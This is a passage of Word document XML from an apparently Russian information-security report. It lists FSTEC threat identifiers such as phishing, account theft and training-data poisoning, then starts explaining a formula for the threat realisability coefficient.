          <w:p w14:paraId="2B0BCB42" w14:textId="58B7881F"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c>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7E816FA0" w14:textId="13EDFBEF"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p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="1EAD0BCB" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="784"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6F5EA526"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УБИ.159</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1CF2838A"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«форсированного веб-браузинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="65EC4877" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="800"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6DFCCF5E"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УБИ.167</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="16AC2AA2"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заражения при посещении неблагонадёжных сайтов</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="28BFA50E" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="904"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3414F11E"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УБИ.168</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2272CA17"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«кражи» учётной записи</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="6A810080" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="582"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3BAEC579"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УБИ.175</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="nil"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3ADA79D7"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«фишинга»</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="4AB0DE68" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="1014"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="142A184A"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УБИ.186</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2DF27CF7"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731F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Угроза внедрения вредоносного кода через рекламу, сервисы, контент</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005A1278" w:rsidRPr="0045731F" w14:paraId="42AC603B" w14:textId="77777777" w:rsidTr="009D5D3A">
        <w:trPr>
          <w:trHeight w:val="1259"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1696" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="061F18CD"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51AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>УБИ.221</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7938" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:left w:val="nil"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="72072D3D" w14:textId="77777777" w:rsidR="005A1278" w:rsidRDefault="005A1278" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="185F62EA" w14:textId="77777777" w:rsidR="005A1278" w:rsidRPr="004551AB" w:rsidRDefault="005A1278" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="004551AB">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
              <w:t>Угроза модификации модели машинного обучения путем искажения («отравления») обучающих данных</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="1E627843" w14:textId="77777777" w:rsidR="005A1278" w:rsidRPr="0045731F" w:rsidRDefault="005A1278" w:rsidP="00AB6434">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="000000"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:eastAsia="ru-RU"/>
              </w:rPr>
            </w:pPr>
          </w:p>
        </w:tc>
      </w:tr>
      <w:bookmarkEnd w:id="8"/>
    </w:tbl>
    <w:p w14:paraId="69F4929E" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="008E0171">
      <w:pPr>
        <w:pStyle w:val="ds-markdown-paragraph"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A9B9C6" w14:textId="3972CD02" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="000B2212">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00604F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Далее необходимо для каждой группы угроз определить </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>коэффициент реализуемости угрозы</w:t>
      </w:r>
      <w:r w:rsidRPr="00604F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00604F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00604F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>. Согласно Методике определения вероятности наступления угрозы, утвержденная ФСТЭК 14.02.2008</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>[</w:t>
      </w:r>
      <w:r w:rsidR="00AA70B6">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>6</w:t>
      </w:r>
      <w:r w:rsidRPr="006632BF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
      <w:r w:rsidRPr="00604F50">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>он рассчитывается для каждой из угроз по формуле 1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9135"/>
        <w:gridCol w:w="560"/>
      </w:tblGrid>
      <w:tr w:rsidR="008E0171" w:rsidRPr="00185959" w14:paraId="23919ADD" w14:textId="77777777" w:rsidTr="00AB6434">
        <w:trPr>
          <w:trHeight w:val="1279"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9351" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1848BCDF" w14:textId="77777777" w:rsidR="008E0171" w:rsidRDefault="008E0171" w:rsidP="007444AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="3982659E" w14:textId="143F1C6C" w:rsidR="008E0171" w:rsidRPr="008405DB" w:rsidRDefault="008E0171" w:rsidP="007444AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:b/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:vertAlign w:val="subscript"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <m:oMath>
              <m:r>
                <m:rPr>
                  <m:sty m:val="p"/>
                </m:rPr>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
                <m:t>Y</m:t>
              </m:r>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
                <m:t>=</m:t>
              </m:r>
              <m:f>
                <m:fPr>
                  <m:ctrlPr>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:b/>
                      <w:i/>
                      <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                  </m:ctrlPr>
                </m:fPr>
                <m:num>
                  <m:sSub>
                    <m:sSubPr>
                      <m:ctrlPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:i/>
                          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                      </m:ctrlPr>
                    </m:sSubPr>
                    <m:e>
                      <m:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <m:t>Y</m:t>
                      </m:r>
                    </m:e>
                    <m:sub>
                      <m:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                          <w:lang w:val="en-US"/>
                        </w:rPr>
                        <m:t>1</m:t>
                      </m:r>
                    </m:sub>
                  </m:sSub>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <m:t>+</m:t>
                  </m:r>
                  <m:sSub>
                    <m:sSubPr>
                      <m:ctrlPr>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:i/>
                          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </m:ctrlPr>
                    </m:sSubPr>
                    <m:e>
                      <m:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <m:t>Y</m:t>
                      </m:r>
                    </m:e>
                    <m:sub>
                      <m:r>
                        <w:rPr>
                          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                          <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                        <m:t>2</m:t>
                      </m:r>
                    </m:sub>
                  </m:sSub>
                </m:num>
                <m:den>
                  <m:r>
                    <w:rPr>
                      <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                      <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                      <w:sz w:val="28"/>
                      <w:szCs w:val="28"/>
                    </w:rPr>
                    <m:t>20</m:t>
                  </m:r>
                </m:den>
              </m:f>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                  <w:sz w:val="28"/>
                  <w:szCs w:val="28"/>
                </w:rPr>
                <m:t>*100%</m:t>
              </m:r>
            </m:oMath>
            <w:r w:rsidRPr="00226438">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00B343A9">
              <w:rPr>
                <w:rFonts w:eastAsiaTheme="minorEastAsia"/>
                <w:b/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="560" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5A81377D" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="007444AC" w:rsidRDefault="008E0171" w:rsidP="007444AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="2A3A8F20" w14:textId="77777777" w:rsidR="008E0171" w:rsidRPr="007444AC" w:rsidRDefault="008E0171" w:rsidP="007444AC">
            <w:pPr>
              <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="007444AC">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                <w:color w:val="171717" w:themeColor="background2" w:themeShade="1A"/>
                <w:sz w:val="28"/>
                <w:szCs w:val="28"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0FBC46DE" w14:textId="77777777" w:rsidR="00B343A9" w:rsidRPr="00B343A9" w:rsidRDefault="00B343A9" w:rsidP="00B343A9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">где </w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> — коэффициент реализуемости угрозы, %;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F7697F" w14:textId="77777777" w:rsidR="00B343A9" w:rsidRPr="00B343A9" w:rsidRDefault="00B343A9" w:rsidP="00B343A9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">1 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>— коэффициент исходной защищённости информационной системы, принимающий значения от 0 до 10 в зависимости от уровня реализованных мер защиты;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="348241ED" w14:textId="46E28C1F" w:rsidR="005A1278" w:rsidRPr="00DD2F4C" w:rsidRDefault="00B343A9" w:rsidP="00B343A9">
      <w:pPr>
        <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
        <w:ind w:firstLine="709"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t xml:space="preserve">2 </w:t>
      </w:r>
      <w:r w:rsidRPr="00B343A9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="0F1115"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
